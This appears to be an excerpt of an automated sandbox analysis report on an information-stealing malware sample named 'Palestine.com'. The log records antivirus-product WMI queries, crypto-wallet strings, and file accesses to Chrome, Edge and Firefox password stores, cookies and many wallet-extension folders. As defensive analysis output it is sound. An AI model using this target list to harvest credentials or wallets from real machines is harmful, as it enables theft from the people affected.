                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpQueries volume information: C:\Users\user\AppData\Roaming\Panorado\electronics.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Palestine.com, 00000011.00000003.1993781956.0000000001D6A000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2023662646.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D6C000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: find.exe, 0000003A.00000002.2191232545.0000014B3E217000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000003A.00000002.2191653265.0000014B3E524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
                Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: Palestine.com PID: 6176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Palestine.com PID: 6148, type: MEMORYSTR
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: +ets/Electrum-LTC
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectronCashE
                Source: Palestine.com, 00000011.00000003.1993781956.0000000001D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyows
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exod
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3{"
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystod>
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Palestine.com, 0000001F.00000002.2389704146.0000000001677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\formhistory.sqlite
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
